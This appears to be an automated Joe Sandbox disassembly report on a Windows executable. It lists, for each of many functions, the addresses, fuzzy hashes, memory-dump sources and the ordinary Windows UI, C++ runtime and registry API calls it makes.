Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 2513498551-3145022300
Opcode ID: a80ada1efe0e7e72f9cdf5468c165dee61139144a79d005c59d2344d6ce5fda2
Instruction ID: d252b567f418daa750668c6fe9d1400ac49463c44efdb5ba88e9487c3c632a5f
Opcode Fuzzy Hash: a80ada1efe0e7e72f9cdf5468c165dee61139144a79d005c59d2344d6ce5fda2
Instruction Fuzzy Hash: 55318D71910215CFCB25DF64D882FAEB3B8EB24724F51465EE822A7291DB70ED44CB91

Function 001F7A6C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001F7A73

Strings

H]3, xrefs: 001F7AAF
L]3, xrefs: 001F7ADF
X]3, xrefs: 001F7AB4
\]3, xrefs: 001F7ABE
P]3, xrefs: 001F7AC3, 001F7AC7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: H]3$L]3$P]3$X]3$\]3
API String ID: 431132790-209029099
Opcode ID: b451a673e5180384f7c332c7498b4a3f089bdce8e6c6df928611d78ab8233268
Instruction ID: 3bf64e1d3d6011f474c2cfe2326481418f192d553afcaf17f769927637c22810
Opcode Fuzzy Hash: b451a673e5180384f7c332c7498b4a3f089bdce8e6c6df928611d78ab8233268
Instruction Fuzzy Hash: AF317A7190010ADFCF14FFA0C8959BEB376BF20310B64452EE9225B2A1DB309E50CB62

Function 001C6310 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 001C6328

Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85A3
Part of subcall function 002D858E: __CxxThrowException@8.LIBCMT ref: 002D85B8
Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85C9

std::_Xinvalid_argument.LIBCPMT ref: 001C6346
std::_Xinvalid_argument.LIBCPMT ref: 001C6361
_memmove.LIBCMT ref: 001C63C5

Strings

invalid string position, xrefs: 001C6323
string too long, xrefs: 001C6341, 001C635C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 4f69ba24ab9e5ab873cb0302920615b34c82bcdf75ecf21504d1c54c392b71fd
Instruction ID: cebbf57814ac3f2f708d2e4b3bf63435d60caa050f424cb83c2dc866672f0ce8
Opcode Fuzzy Hash: 4f69ba24ab9e5ab873cb0302920615b34c82bcdf75ecf21504d1c54c392b71fd
Instruction Fuzzy Hash: F821A2323002408FD7259E6CE890F2AF7E5BFA5720B604A2EF45A8B781DB71DC50C760

Function 001EFA89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001EFB06
ScreenToClient.USER32(?,?), ref: 001EFB13
_memset.LIBCMT ref: 001EFB21
_free.LIBCMT ref: 001EFB5E
SendMessageW.USER32(?,00000030,00000000,00000000), ref: 001EFB80

Strings

,, xrefs: 001EFB37

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientCursorMessageScreenSend_free_memset
String ID: ,
API String ID: 628317799-3772416878
Opcode ID: 7f904db18dda5924c682617f858dc504b18fd299d0b6d1f85892fb193dca1c63
Instruction ID: 256611528abdf15ec17815a68c57864e881e97b0d587006ff59ba7be603521f1
Opcode Fuzzy Hash: 7f904db18dda5924c682617f858dc504b18fd299d0b6d1f85892fb193dca1c63
Instruction Fuzzy Hash: 2A318C31A10245AFCB28DBB9EC85E9DBBB8EB48315F20453DF80AD61A1DB309901CB50

Function 001C6010 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 001C601F

Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85A3
Part of subcall function 002D858E: __CxxThrowException@8.LIBCMT ref: 002D85B8
Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85C9

std::_Xinvalid_argument.LIBCPMT ref: 001C6035
std::_Xinvalid_argument.LIBCPMT ref: 001C6050
_memmove.LIBCMT ref: 001C60B2

Strings

invalid string position, xrefs: 001C601A
string too long, xrefs: 001C6030, 001C604B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 9351590da3629bdd37922439f4d3ec21a80a6e1628ba0e7075e0b798bd9f375d
Instruction ID: bdc29d81ea736c5912a8efaeb5c21040da61c5fca30aee546b32c0fe81b2ab20
Opcode Fuzzy Hash: 9351590da3629bdd37922439f4d3ec21a80a6e1628ba0e7075e0b798bd9f375d
Instruction Fuzzy Hash: 8721B5313102005BD7399E6CDC91F6EB7EAAFA5710B504A1EF482EB781DB61EC64C7A4

Function 001E104E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001E06C8: IsIconic.USER32(?), ref: 001E06E8

GetWindowRect.USER32(?,?), ref: 001E10C6

Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D012C
Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D0139

Part of subcall function 001E0CBE: __EH_prolog3_GS.LIBCMT ref: 001E0CC8
Part of subcall function 001E0CBE: GetWindowRect.USER32(?,?), ref: 001E0D17
Part of subcall function 001E0CBE: OffsetRect.USER32(?,?,?), ref: 001E0D2D
Part of subcall function 001E0CBE: CreateCompatibleDC.GDI32(?), ref: 001E0D9E
Part of subcall function 001E0CBE: SelectObject.GDI32(?,?), ref: 001E0DBE

GetModuleHandleW.KERNEL32(DWMAPI), ref: 001E10FE
GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 001E110E
DeleteObject.GDI32(00000000), ref: 001E1125

Strings

DWMAPI, xrefs: 001E10F9
DwmSetIconicLivePreviewBitmap, xrefs: 001E1108

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientObjectScreenWindow$AddressCompatibleCreateDeleteH_prolog3_HandleIconicModuleOffsetProcSelect
String ID: DWMAPI$DwmSetIconicLivePreviewBitmap
API String ID: 3205686482-239049650
Opcode ID: aba5b4744e4653f7bb4c403b9c0901fd5b9672436fd49de4ca8d9db33efc0d2e
Instruction ID: 31446a1cdc2653c83464c7551a5d97186d8d2c55725d33d06071713b0c431edb
Opcode Fuzzy Hash: aba5b4744e4653f7bb4c403b9c0901fd5b9672436fd49de4ca8d9db33efc0d2e
Instruction Fuzzy Hash: AD317EB1A40649AF8B05DFAAD8858BEFBF9EF98700B10056EE116E7251CB705D00CB60

Function 002A8A42 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002A8A49

Part of subcall function 00297DE9: __EH_prolog3.LIBCMT ref: 00297DF0

Part of subcall function 002B9306: __EH_prolog3.LIBCMT ref: 002B930D

Strings

dF/, xrefs: 002A8ACD
dI/, xrefs: 002A8A9F
G/, xrefs: 002A8AE7
dI/, xrefs: 002A8B16
X*1, xrefs: 002A8B86

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: X*1$dF/$dI/$dI/$G/
API String ID: 431132790-3278520713
Opcode ID: 8b927ace8add995c0ec39ae5dbb5aff756cefbeb6172c589a8e0325aa4fa6591
Instruction ID: f71e116de92fec816470b6fc64051b1bd7cb7485d801ba9f28a64313ac168600
Opcode Fuzzy Hash: 8b927ace8add995c0ec39ae5dbb5aff756cefbeb6172c589a8e0325aa4fa6591
Instruction Fuzzy Hash: A1411CB4805B88DED761EF78C045BDFBBE4AF25304F10495EA6AA57282DF702648CB16

Function 002004A5 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

LockWindowUpdate.USER32(00000000,00000000,?,?,?,0027571B,00000000), ref: 002004E6
ValidateRect.USER32(?,00000000,?,?,0027571B,00000000), ref: 0020051B
UpdateWindow.USER32(?), ref: 00200520
LockWindowUpdate.USER32(00000000,?,0027571B,00000000), ref: 00200533
ValidateRect.USER32(?,00000000,?,?,0027571B,00000000), ref: 0020055A
UpdateWindow.USER32(?), ref: 0020055F
LockWindowUpdate.USER32(00000000,?,0027571B,00000000), ref: 00200572

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: UpdateWindow$Lock$RectValidate
String ID:
API String ID: 797752328-0
Opcode ID: 0cc62b292fb530919aa8957a60ee403bcc5b89ded39577229652a13b8a6214d2
Instruction ID: abb1a9e05c64ca0bdda757624418d5034f745c422fb124b9394ee46663ecc13b
Opcode Fuzzy Hash: 0cc62b292fb530919aa8957a60ee403bcc5b89ded39577229652a13b8a6214d2
Instruction Fuzzy Hash: 7821CE32610202EBEB254F54ECC8B69BBB1FF44350F694029E54D6B1A2DB70EDA0DB90

Function 00208463 Relevance: 10.6, APIs: 7, Instructions: 80windowthreadCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,00000000), ref: 00208483
GetParent.USER32(?), ref: 00208491
GetWindowThreadProcessId.USER32(?,?), ref: 002084AC
GetCurrentProcessId.KERNEL32 ref: 002084B2
GetActiveWindow.USER32 ref: 00208505
SendMessageW.USER32(?,00000006,00000001,00000000), ref: 00208519
SendMessageW.USER32(?,00000086,00000001,00000000), ref: 0020852D

Part of subcall function 001DCD97: EnableWindow.USER32(?,?), ref: 001DCDA8

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
String ID:
API String ID: 2169720751-0
Opcode ID: 03b1be5176c78ec30210f6cd1b83e02d6622dfc5b64d704db7a36b60502f0e46
Instruction ID: 6c5934cca76543dc0381f5919eabf773e010dfa7368b57b8c5748b31c59f6852
Opcode Fuzzy Hash: 03b1be5176c78ec30210f6cd1b83e02d6622dfc5b64d704db7a36b60502f0e46
Instruction Fuzzy Hash: B1210231250740ABCB219F24DCC8B6B7FA5FF44714F250518F5CA8B1E2CFB0A8808B50

Function 00212AAD Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00212AC5
SendMessageW.USER32(?,0000020A,?,?), ref: 00212AF7
GetFocus.USER32 ref: 00212B0B
IsChild.USER32(?,?), ref: 00212B2D
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00212B5E
IsWindowVisible.USER32(?), ref: 00212B73
SendMessageW.USER32(?,0000020A,?,?), ref: 00212B91

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$Window$ChildFocusVisible
String ID:
API String ID: 1252167185-0
Opcode ID: a3578a72adc56c9f3a8d61ed51b44e2c9a3c9316887c94a5f3548b00f8c0c57d
Instruction ID: 903818fd9c57780f25a6c4f00632b2b192258dc4994c6a6af5246561f02be89d
Opcode Fuzzy Hash: a3578a72adc56c9f3a8d61ed51b44e2c9a3c9316887c94a5f3548b00f8c0c57d
Instruction Fuzzy Hash: 4D218D72224202EFDB219F20DC85FA677E9BB19744F054664F849EF1B0DB71ED609B40

Function 001D41A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 001D41DF
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 001D420A
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 001D4235
RegCloseKey.ADVAPI32(?), ref: 001D4249
RegCloseKey.ADVAPI32(?), ref: 001D4253

Part of subcall function 001D17E4: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D17F6
Part of subcall function 001D17E4: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 001D1806

Strings

software, xrefs: 001D41C1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CloseCreate$AddressHandleModuleOpenProc
String ID: software
API String ID: 550756860-2010147023
Opcode ID: 3ff71294d6e94c3e17c2f80358016c96b3a66080e0b686e50d5600a2bf66ecd4
Instruction ID: 22d62fd07d7f5ffb2304e6a799a3b13578862051d35588ad43f6ae85c9ae4c15
Opcode Fuzzy Hash: 3ff71294d6e94c3e17c2f80358016c96b3a66080e0b686e50d5600a2bf66ecd4
Instruction Fuzzy Hash: 8D211871900058FB8B219B96EC88CAFBFBEEBD5700B24415BF50AA2211D7315A45DB61

Function 0024BE4A Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0024BE51

Part of subcall function 0024BD98: __EH_prolog3.LIBCMT ref: 0024BD9F
Part of subcall function 0024BD98: GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 0024BDF7
Part of subcall function 0024BD98: GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 0024BE09

CopyRect.USER32(?,?), ref: 0024BE7F
GetCursorPos.USER32(?), ref: 0024BE91
SetRect.USER32(?,?,?,?,?), ref: 0024BEA7
IsRectEmpty.USER32(?), ref: 0024BEC2
InflateRect.USER32(?,00000002,00000002), ref: 0024BED4
DoDragDrop.OLE32(00000000,00000000,?,00000000), ref: 0024BF2B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
String ID:
API String ID: 1837043813-0
Opcode ID: 9f71f3a9b1ae8134f11c6f273ffc3aed47886716e994a1633c8da2c7a1289da5
Instruction ID: c978074eba1c22bd6002495eb50077af36277743ed47a12b066491ce1843404d
Opcode Fuzzy Hash: 9f71f3a9b1ae8134f11c6f273ffc3aed47886716e994a1633c8da2c7a1289da5
Instruction Fuzzy Hash: 96215C72A102599BCB06EFE0CD889EEB7B9BF98700F504519EA06AB250DB70AD15DF50

Function 001F24CE Relevance: 10.6, APIs: 7, Instructions: 76windowCOMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 001F24F0
InflateRect.USER32(?,000000FF,000000FF), ref: 001F24FE
PatBlt.GDI32(?,?,?,00000001,?,005A0049), ref: 001F252A
PatBlt.GDI32(?,?,?,?,00000001,005A0049), ref: 001F253F
PatBlt.GDI32(?,00000000,?,00000001,?,005A0049), ref: 001F2554
PatBlt.GDI32(?,?,?,00000000,00000001,005A0049), ref: 001F256A
FillRect.USER32(?,?), ref: 001F257F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Fill$Inflate
String ID:
API String ID: 2224923502-0
Opcode ID: 5a2fc5920e75c5df955b2ed64d17dd5241b32d1ca9f08817164a9538dfe1d9dd
Instruction ID: db6c7ac4610918459bb80cd83ec047e1ad6d6ca5c97bc424ee49230143293d37
Opcode Fuzzy Hash: 5a2fc5920e75c5df955b2ed64d17dd5241b32d1ca9f08817164a9538dfe1d9dd
Instruction Fuzzy Hash: 9E21C672500149FFDF01DF58ED89EAA7FA9FB48320F048115BE199A160C772E960DBA0

Function 001D1054 Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 001D1079
ClientToScreen.USER32(?,?), ref: 001D1098
GetWindow.USER32(?,00000005), ref: 001D10FB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ChildClientFromPointRealScreen
String ID:
API String ID: 2518355518-0
Opcode ID: a1fea06b70e29d76ba346daa47e284dd3fdd2be4a6dcf8b1d916bff3101adcee
Instruction ID: b7c59d511174b1a2416705637055bddc5297455b9a6411657f6216284fe2e6f0
Opcode Fuzzy Hash: a1fea06b70e29d76ba346daa47e284dd3fdd2be4a6dcf8b1d916bff3101adcee
Instruction Fuzzy Hash: 0C218076E5125ABFDB14DFA4DC49BFEB7B8EF09312F10011AF505E6240CB349A458BA1

Function 001EF968 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001EF3CD: __EH_prolog3_GS.LIBCMT ref: 001EF3D4
Part of subcall function 001EF3CD: GetWindowRect.USER32(?,?), ref: 001EF415
Part of subcall function 001EF3CD: CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000004,00000004), ref: 001EF43F
Part of subcall function 001EF3CD: SetWindowRgn.USER32(?,?,00000000), ref: 001EF455

GetSystemMenu.USER32(?,00000000), ref: 001EF9DC
DeleteMenu.USER32(?,0000F120,00000000,00000000), ref: 001EF9FD
DeleteMenu.USER32(?,0000F020,00000000), ref: 001EFA09
DeleteMenu.USER32(?,0000F030,00000000), ref: 001EFA15
EnableMenuItem.USER32(?,0000F060,00000001), ref: 001EFA2F

Part of subcall function 001E8497: SetRectEmpty.USER32(?), ref: 001E84CA
Part of subcall function 001E8497: ReleaseCapture.USER32 ref: 001E84D0
Part of subcall function 001E8497: SetCapture.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 001E84DF
Part of subcall function 001E8497: GetCapture.USER32 ref: 001E8521
Part of subcall function 001E8497: ReleaseCapture.USER32 ref: 001E8531
Part of subcall function 001E8497: SetCapture.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 001E8540
Part of subcall function 001E8497: RedrawWindow.USER32(?,?,?,00000505), ref: 001E85AB

Strings

4{/, xrefs: 001EF9C6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
